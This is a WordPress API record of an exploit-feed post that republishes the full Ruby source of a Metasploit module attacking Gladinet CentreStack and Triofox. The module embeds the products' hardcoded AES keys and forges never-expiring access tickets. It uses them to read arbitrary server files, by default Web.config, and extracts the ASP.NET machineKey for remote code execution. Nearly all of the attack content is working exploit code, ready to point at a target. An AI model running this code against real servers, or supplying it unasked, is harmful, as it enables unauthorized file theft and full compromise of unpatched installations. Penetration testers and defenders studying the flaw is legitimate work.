{"id":39103,"date":"2026-02-04T13:51:45","date_gmt":"2026-02-04T13:51:45","guid":{"rendered":"http:\/\/localhost\/?p=39103"},"modified":"2026-02-04T13:51:45","modified_gmt":"2026-02-04T13:51:45","slug":"gladinet-centrestacktriofox-access-ticket-forge","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39103","title":{"rendered":"Gladinet CentreStack\/Triofox Access Ticket Forge_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-04T19:28:01&#8243;,&#8221;description&#8221;:&#8221;This module forges access tickets for the Gladinet CentreStack\/Triofox \/storage\/filesvr.dn endpoint. The vulnerability exists because the application uses hardcoded cryptographic keys in GladCtrl64.dll to encrypt\/decrypt access tickets. The access&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-04T18:58:58&#8243;,&#8221;modified&#8221;:&#8221;2026-02-04T18:58:58&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Gladinet CentreStack\/Triofox Access Ticket Forge&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire &#8216;openssl&#8217;\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n  include Msf::Exploit::Remote::HttpClient\\n  include Msf::Auxiliary::Report\\n  include Msf::Auxiliary::Gladinet\\n  prepend Msf::Exploit::Remote::AutoCheck\\n\\n  # Hardcoded keys extracted from GladCtrl64.dll\\n  # SysKey: First 32 UTF-16 characters from DAT_18000c000 converted to UTF-8, then first 32 bytes\\n  # SysKey1: First 16 UTF-16 characters from DAT_18000c2c0 converted to UTF-8, then first 16 bytes\\n  # These keys are static and identical across all vulnerable installations\\n  # Extracted from DAT_18000c000 (SysKey) and DAT_18000c2c0 (SysKey1)\\n  # The C code does: memcpy with strlen, but the actual keys used are UTF-16 chars -\\u003e UTF-8 bytes\\n  DEFAULT_SYS_KEY = &#8216;E4B88DE8BF87EFBC8CE8B083E69FA5E4B99FE698BEE7A4BAEFBC8CE697A5E69C&#8217;.freeze\\n  DEFAULT_SYS_KEY1 = &#8216;6D6F4472697665E381AFE38081E38389&#8217;.freeze\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Gladinet CentreStack\/Triofox Access Ticket Forge&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module forges access tickets for the Gladinet CentreStack\/Triofox\\n          `\/storage\/filesvr.dn` endpoint. The vulnerability exists because\\n          the application uses hardcoded cryptographic keys in GladCtrl64.dll to encrypt\/decrypt\\n          access tickets.\\n\\n          The access ticket is an encrypted string that contains:\\n          &#8211; Filepath: The absolute path to the file on the server\\n          &#8211; Username: Empty (Application Pool Identity will be used)\\n          &#8211; Password: Empty\\n          &#8211; Timestamp: Creation time (set to excessive year to never expire)\\n\\n          This module can forge tickets to read arbitrary files from the server&#8217;s file system.\\n\\n          Gladinet CentreStack versions up to 16.12.10420.56791 are vulnerable.\\n          Gladinet Triofox versions up to 16.12.10420.56791 are vulnerable.\\n        },\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Huntress Team&#8217;, # Vulnerability discovery and analysis\\n          &#8216;Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e&#8217;, # Metasploit module\\n          &#8216;Julien Voisin&#8217; # Review\\n        ],\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;URL&#8217;, &#8216;https:\/\/www.huntress.com\/blog\/active-exploitation-gladinet-centrestack-triofox-insecure-cryptography-vulnerability&#8217;]\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-12-10&#8217;,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS],\\n          &#8216;Reliability&#8217; =\\u003e []\\n        },\\n        &#8216;Actions&#8217; =\\u003e [\\n          [&#8216;READ_FILE&#8217;, { &#8216;Description&#8217; =\\u003e &#8216;Read an arbitrary file from the target&#8217; }],\\n          [&#8216;EXTRACT_MACHINEKEY&#8217;, { &#8216;Description&#8217; =\\u003e &#8216;Read Web.config and extract the machineKey for RCE&#8217; }]\\n        ],\\n        &#8216;DefaultAction&#8217; =\\u003e &#8216;EXTRACT_MACHINEKEY&#8217;\\n      )\\n    )\\n\\n    register_options([\\n      OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;The base path to the Gladinet CentreStack or Triofox application&#8217;, &#8216;\/&#8217;]),\\n      OptString.new(&#8216;FILEPATH&#8217;, [true, &#8216;Absolute path to the file to read on the target&#8217;, &#8216;C:\\\\\\\\Program Files (x86)\\\\\\\\Gladinet Cloud Enterprise\\\\\\\\root\\\\\\\\Web.config&#8217;]),\\n      OptEnum.new(&#8216;PRODUCT&#8217;, [true, &#8216;Target product type&#8217;, &#8216;CentreStack&#8217;, [&#8216;CentreStack&#8217;, &#8216;Triofox&#8217;]]),\\n      OptString.new(&#8216;SYSKEY&#8217;, [true, &#8216;SysKey (32 bytes) in hex format&#8217;, DEFAULT_SYS_KEY]),\\n      OptString.new(&#8216;SYSKEY1&#8217;, [true, &#8216;SysKey1 (16 bytes) in hex format&#8217;, DEFAULT_SYS_KEY1])\\n    ])\\n  end\\n\\n  def get_sys_key\\n    [datastore[&#8216;SYSKEY&#8217;]].pack(&#8216;H*&#8217;)\\n  end\\n\\n  def get_sys_key1\\n    [datastore[&#8216;SYSKEY1&#8217;]].pack(&#8216;H*&#8217;)\\n  end\\n\\n  def generate_timestamp\\n    # Generate random timestamp with excessive year (100+ years in future) to never expire\\n    # Format: YYYY-MM-DD HH:MM:SS.microseconds\\n    current_year = Time.now.year\\n    year_min = current_year + 100\\n    year_max = current_year + 9999\\n\\n    ranges = [\\n      [year_min, year_max],\\n      [1, 12],\\n      [1, 28], # Use 28 to avoid month-specific day issues\\n      [0, 23],\\n      [0, 59],\\n      [0, 59],\\n      [0, 999_999]\\n    ]\\n    values = ranges.map do |min, max|\\n      range_size = max &#8211; min + 1\\n      random_offset = Rex::Text.rand_text_numeric(range_size.to_s.length).to_i % range_size\\n      min + random_offset\\n    end\\n    format(&#8216;%04d-%02d-%02d %02d:%02d:%02d.%06d&#8217;, *values)\\n  end\\n\\n  def forge_ticket(filepath, timestamp = nil)\\n    # Build plaintext ticket: Filepath\\\\n\\\\n\\\\nTimestamp (no trailing newline)\\n    timestamp ||= generate_timestamp\\n    plaintext = \\&#8221;#{filepath}\\\\n\\\\n\\\\n#{timestamp}\\&#8221;\\n\\n    sys_key = get_sys_key\\n    sys_key1 = get_sys_key1\\n\\n    if sys_key.length != 32\\n      fail_with(Failure::BadConfig, \\&#8221;SysKey must be exactly 32 bytes, got #{sys_key.length}\\&#8221;)\\n    end\\n    if sys_key1.length != 16\\n      fail_with(Failure::BadConfig, \\&#8221;SysKey1 must be exactly 16 bytes, got #{sys_key1.length}\\&#8221;)\\n    end\\n\\n    # Encrypt with AES-256-CBC, then Base64 encode with URL-safe encoding (+ -\\u003e :, \/ -\\u003e |)\\n    cipher = OpenSSL::Cipher.new(&#8216;AES-256-CBC&#8217;)\\n    cipher.encrypt\\n    cipher.key = sys_key\\n    cipher.iv = sys_key1\\n    encrypted = cipher.update(plaintext) + cipher.final\\n    Rex::Text.encode_base64(encrypted).tr(&#8216;+\/&#8217;, &#8216;:|&#8217;)\\n  end\\n\\n  def check\\n    version = gladinet_version\\n    return Exploit::CheckCode::Detected(&#8216;Gladinet detected but version could not be determined&#8217;) if version.nil?\\n\\n    rex_version = Rex::Version.new(version)\\n    return Exploit::CheckCode::Vulnerable(\\&#8221;Access ticket forge vulnerability confirmed (Build #{version})\\&#8221;) if rex_version \\u003c= Rex::Version.new(&#8216;16.12.10420.56791&#8217;)\\n\\n    Exploit::CheckCode::Appears(\\&#8221;Version #{version} detected, attempting ticket forge anyway\\&#8221;)\\n  end\\n\\n  def storage_endpoint\\n    # CentreStack and Triofox use different paths\\n    case datastore[&#8216;PRODUCT&#8217;]\\n    when &#8216;Triofox&#8217;\\n      normalize_uri(target_uri.path, &#8216;servlets&#8217;, &#8216;filesvr.dn&#8217;)\\n    else\\n      normalize_uri(target_uri.path, &#8216;storage&#8217;, &#8216;filesvr.dn&#8217;)\\n    end\\n  end\\n\\n  def default_webconfig_path\\n    case datastore[&#8216;PRODUCT&#8217;]\\n    when &#8216;Triofox&#8217;\\n      &#8216;C:\\\\\\\\Program Files (x86)\\\\\\\\Triofox\\\\\\\\root\\\\\\\\Web.config&#8217;\\n    else\\n      &#8216;C:\\\\\\\\Program Files (x86)\\\\\\\\Gladinet Cloud Enterprise\\\\\\\\root\\\\\\\\Web.config&#8217;\\n    end\\n  end\\n\\n  def read_file_via_ticket(filepath)\\n    print_status(\\&#8221;Forging access ticket for file: #{filepath}\\&#8221;)\\n    ticket = forge_ticket(filepath)\\n\\n    print_good(\\&#8221;Forged access ticket: #{ticket}\\&#8221;)\\n\\n    print_status(\\&#8221;Sending request to #{storage_endpoint}\\&#8221;)\\n    res = send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e storage_endpoint,\\n      &#8216;vars_get&#8217; =\\u003e { &#8216;t&#8217; =\\u003e ticket }\\n    })\\n\\n    unless res\\u0026.code == 200\\n      print_error(\\&#8221;Failed to read file. HTTP response code: #{res\\u0026.code}\\&#8221;)\\n      return nil\\n    end\\n\\n    ticket_path = store_loot(\\n      &#8216;gladinet.ticket&#8217;,\\n      &#8216;text\/plain&#8217;,\\n      datastore[&#8216;RHOST&#8217;],\\n      ticket,\\n      &#8216;access_ticket.txt&#8217;,\\n      &#8216;Forged access ticket for Gladinet&#8217;\\n    )\\n    print_good(\\&#8221;Access ticket saved to: #{ticket_path}\\&#8221;)\\n\\n    res.body\\n  end\\n\\n  def run\\n    case action.name\\n    when &#8216;READ_FILE&#8217;\\n      run_read_file\\n    when &#8216;EXTRACT_MACHINEKEY&#8217;\\n      run_extract_machinekey\\n    end\\n  end\\n\\n  def run_read_file\\n    filepath = datastore[&#8216;FILEPATH&#8217;]\\n    file_content = read_file_via_ticket(filepath)\\n    return if file_content.nil?\\n\\n    print_good(\\&#8221;Successfully read file: #{filepath}\\&#8221;)\\n    print_line\\n    print_line(file_content)\\n    print_line\\n\\n    fname = File.basename(filepath)\\n    path = store_loot(\\n      &#8216;gladinet.file&#8217;,\\n      &#8216;text\/plain&#8217;,\\n      datastore[&#8216;RHOST&#8217;],\\n      file_content,\\n      fname,\\n      &#8216;File read from Gladinet via forged access ticket&#8217;\\n    )\\n    print_good(\\&#8221;File saved to: #{path}\\&#8221;)\\n  end\\n\\n  def run_extract_machinekey\\n    filepath = datastore[&#8216;FILEPATH&#8217;]\\n    # Use default Web.config path if the user hasn&#8217;t changed FILEPATH\\n    if filepath == &#8216;C:\\\\\\\\Program Files (x86)\\\\\\\\Gladinet Cloud Enterprise\\\\\\\\root\\\\\\\\Web.config&#8217;\\n      filepath = default_webconfig_path\\n    end\\n\\n    file_content = read_file_via_ticket(filepath)\\n    return if file_content.nil?\\n\\n    print_good(\\&#8221;Successfully read file: #{filepath}\\&#8221;)\\n    print_line\\n    print_line(file_content)\\n    print_line\\n\\n    fname = File.basename(filepath)\\n    path = store_loot(\\n      &#8216;gladinet.file&#8217;,\\n      &#8216;text\/plain&#8217;,\\n      datastore[&#8216;RHOST&#8217;],\\n      file_content,\\n      fname,\\n      &#8216;File read from Gladinet via forged access ticket&#8217;\\n    )\\n    print_good(\\&#8221;File saved to: #{path}\\&#8221;)\\n\\n    handle_machinekey_extraction(file_content, filepath, &#8216;MachineKey extracted from Gladinet Web.config&#8217;)\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/gather\/gladinet_storage_access_ticket_forge.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/gather\/gladinet_storage_access_ticket_forge\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-04T19:28:01&#8243;,&#8221;description&#8221;:&#8221;This module forges access tickets for the Gladinet CentreStack\/Triofox \/storage\/filesvr.dn endpoint. The vulnerability exists because the application uses hardcoded cryptographic keys in GladCtrl64.dll to encrypt\/decrypt&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-39103","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Gladinet CentreStack\/Triofox Access Ticket Forge_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39103\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Gladinet CentreStack\/Triofox Access Ticket Forge_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-04T19:28:01&#8243;,&#8221;description&#8221;:&#8221;This module forges access tickets for the Gladinet CentreStack\/Triofox \/storage\/filesvr.dn endpoint. The vulnerability exists because the application uses hardcoded cryptographic keys in GladCtrl64.dll to encrypt\/decrypt...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=39103\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-04T13:51:45+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39103#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39103\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Gladinet CentreStack\\\/Triofox Access Ticket Forge_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE-\",\"datePublished\":\"2026-02-04T13:51:45+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39103\"},\"wordCount\":1486,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39103#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39103\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39103\",\"name\":\"Gladinet CentreStack\\\/Triofox Access Ticket Forge_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-04T13:51:45+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39103#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=39103\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=39103#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Gladinet CentreStack\\\/Triofox Access Ticket Forge_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Gladinet CentreStack\/Triofox Access Ticket Forge_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=39103","og_locale":"en_US","og_type":"article","og_title":"Gladinet CentreStack\/Triofox Access Ticket Forge_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-04T19:28:01&#8243;,&#8221;description&#8221;:&#8221;This module forges access tickets for the Gladinet CentreStack\/Triofox \/storage\/filesvr.dn endpoint. The vulnerability exists because the application uses hardcoded cryptographic keys in GladCtrl64.dll to encrypt\/decrypt...","og_url":"https:\/\/zero.redgem.net\/?p=39103","og_site_name":"zero redgem","article_published_time":"2026-02-04T13:51:45+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=39103#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=39103"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Gladinet CentreStack\/Triofox Access Ticket Forge_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE-","datePublished":"2026-02-04T13:51:45+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=39103"},"wordCount":1486,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=39103#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=39103","url":"https:\/\/zero.redgem.net\/?p=39103","name":"Gladinet CentreStack\/Triofox Access Ticket Forge_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-04T13:51:45+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=39103#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=39103"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=39103#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Gladinet CentreStack\/Triofox Access Ticket Forge_MSF:AUXILIARY-GATHER-GLADINET_STORAGE_ACCESS_TICKET_FORGE-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39103","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=39103"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/39103\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=39103"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=39103"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=39103"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}